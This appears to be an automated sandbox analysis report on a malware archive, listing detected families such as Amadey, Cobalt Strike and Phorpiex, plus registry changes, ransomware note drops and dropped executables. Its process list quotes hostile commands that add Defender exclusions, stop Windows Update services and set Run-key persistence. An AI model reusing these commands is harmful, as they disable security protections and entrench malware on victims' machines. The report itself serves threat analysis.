Analysis Overview
SHA256
39345b9dc44db0aec3ceb63efa9f4b0bb74753da4fa421745acff9835f50debc
Threat Level: Known bad
The file Malware with taskmgr.zip was found to be: Known bad.
Malicious Activity Summary
AmmyyAdmin payload
Ammyy Admin
Suspicious use of NtCreateUserProcessOtherParentProcess
Amadey
FlawedAmmyy RAT
Cobaltstrike
Windows security bypass
Phorphiex payload
Modifies security service
Phorphiex, Phorpiex
Credentials from Password Stores: Credentials from Web Browsers
Renames multiple (1484) files with added filename extension
Downloads MZ/PE file
Blocklisted process makes network request
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Reads local data of messenger clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Reads WinSCP keys stored on the system
Loads dropped DLL
Executes dropped EXE
Windows security modification
Adds Run key to start application
Looks up external IP address via web service
Drops desktop.ini file(s)
Writes to the Master Boot Record (MBR)
Suspicious use of SetThreadContext
Command and Scripting Interpreter: AutoIT
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Enumerates physical storage devices
System Network Configuration Discovery: Wi-Fi Discovery
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Checks processor information in registry
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-08-06 22:38
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-06 22:37
Reported
2024-08-06 22:42
Platform
win11-20240802-en
Max time kernel
239s
Max time network
250s
Command Line
Signatures
Amadey
Ammyy Admin
AmmyyAdmin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Cobaltstrike
FlawedAmmyy RAT
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | C:\Windows\sysmysldrv.exe | N/A |
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3152 created 3356 | N/A | C:\Users\Admin\AppData\Local\Temp\1583029623.exe | C:\Windows\Explorer.EXE |
| PID 3152 created 3356 | N/A | C:\Users\Admin\AppData\Local\Temp\1583029623.exe | C:\Windows\Explorer.EXE |
| PID 3956 created 3356 | N/A | C:\Users\Admin\Windows Upgrade\wupgrdsv.exe | C:\Windows\Explorer.EXE |
| PID 3956 created 3356 | N/A | C:\Users\Admin\Windows Upgrade\wupgrdsv.exe | C:\Windows\Explorer.EXE |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysmysldrv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysmysldrv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysmysldrv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysmysldrv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysmysldrv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysmysldrv.exe | N/A |
Credentials from Password Stores: Credentials from Web Browsers
Renames multiple (1484) files with added filename extension
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Stops running service(s)
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysmysldrv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysmysldrv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysmysldrv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysmysldrv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysmysldrv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\sysmysldrv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysmysldrv.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysmysldrv.exe" | C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000\Software\Microsoft\Windows\CurrentVersion\Run\httpsfuncaptcha.ruhvnc.exe = "C:\\Users\\Admin\\AppData\\Roaming\\httpsfuncaptcha.ruhvnc.exe.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DP_Main = "C:\\Users\\Admin\\AppData\\Roaming\\DP\\DP_Main.exe" | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-1735401866-3802634615-1355934272-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\$Recycle.Bin\S-1-5-21-1735401866-3802634615-1355934272-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-21-1735401866-3802634615-1355934272-1000\desktop.ini | C:\Windows\system32\rundll32.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | myexternalip.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe | N/A |
Command and Scripting Interpreter: AutoIT
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\temp2\Autoit3.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 6024 set thread context of 1660 | N/A | C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.exe | C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.exe |
| PID 5944 set thread context of 3612 | N/A | C:\Users\Admin\AppData\Local\Temp\http69.166.230.221112sahost.exe.exe | C:\Users\Admin\AppData\Local\Temp\http69.166.230.221112sahost.exe.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\TipRes.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File created | C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\#DECRYPT MY FILES#.html | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Configuration.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File created | C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#DECRYPT MY FILES#.html | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.pt-br.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Console.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-multibyte-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages.properties | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pl.txt | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Reflection.Emit.Lightweight.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Reflection.Metadata.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Transactions.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_ja.properties | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_CopyDrop32x32.gif | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\security\java.policy | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\api-ms-win-crt-environment-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-synch-l1-2-0.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\.version | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\sawindbg.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipsfra.xml | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\lib\ant-javafx.jar | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Xml.ReaderWriter.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.ComponentModel.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\xjc.exe | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\j2gss.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\ucrtbase.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\descript.ion | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File created | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad\#DECRYPT MY FILES#.html | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\pl-PL\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Net.Primitives.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\legal\jdk\santuario.md | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\License.txt | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-file-l2-1-0.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.ValueTuple.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Formats.Tar.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\api-ms-win-core-file-l1-2-0.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-runtime-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\wab32.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-crt-multibyte-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Reflection.TypeExtensions.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.IO.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\he.txt | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.fi-fi.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\hwrenclm.dat | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\msxactps.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\msquic.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File created | C:\Program Files\#DECRYPT MY FILES#.html | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.ja-jp.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\msadds.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.IO.IsolatedStorage.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Memory.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\extcheck.exe | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javah.exe | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\plugin.jar | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\GroupPop.cab | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ast.txt | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fi-FI\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\COPYRIGHT | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\msadce.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\deploy.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jsound.dll | C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysmysldrv.exe | C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe | N/A |
| File opened for modification | C:\Windows\sysmysldrv.exe | C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3193133307.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\http212.227.175.227nc.exe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\41933479.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\http80.66.75.214amadey.exe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\466504e025\Utsysc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\http204.44.86.164193.exe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysmysldrv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\984329850.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\http149.88.90.88az.exe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1913724727.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\http69.166.230.221112sahost.exe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\temp2\Autoit3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | \??\c:\temp2\Autoit3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | \??\c:\temp2\Autoit3.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"
C:\Users\Admin\AppData\Local\Temp\httpsfuncaptcha.ruhvnc.exe.exe
"C:\Users\Admin\AppData\Local\Temp\httpsfuncaptcha.ruhvnc.exe.exe"
C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe
"C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe"
C:\Windows\sysmysldrv.exe
C:\Windows\sysmysldrv.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
C:\Users\Admin\AppData\Local\Temp\984329850.exe
C:\Users\Admin\AppData\Local\Temp\984329850.exe
C:\Windows\SysWOW64\sc.exe
sc stop UsoSvc
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
C:\Windows\SysWOW64\sc.exe
sc stop WaaSMedicSvc
C:\Windows\SysWOW64\sc.exe
sc stop wuauserv
C:\Windows\SysWOW64\sc.exe
sc stop DoSvc
C:\Windows\SysWOW64\sc.exe
sc stop BITS
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'httpsfuncaptcha.ruhvnc.exe';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'httpsfuncaptcha.ruhvnc.exe' -Value '"C:\Users\Admin\AppData\Roaming\httpsfuncaptcha.ruhvnc.exe.exe"' -PropertyType 'String'
C:\Users\Admin\AppData\Local\Temp\3193133307.exe
C:\Users\Admin\AppData\Local\Temp\3193133307.exe
C:\Users\Admin\AppData\Local\Temp\1913724727.exe
C:\Users\Admin\AppData\Local\Temp\1913724727.exe
C:\Users\Admin\AppData\Local\Temp\41933479.exe
C:\Users\Admin\AppData\Local\Temp\41933479.exe
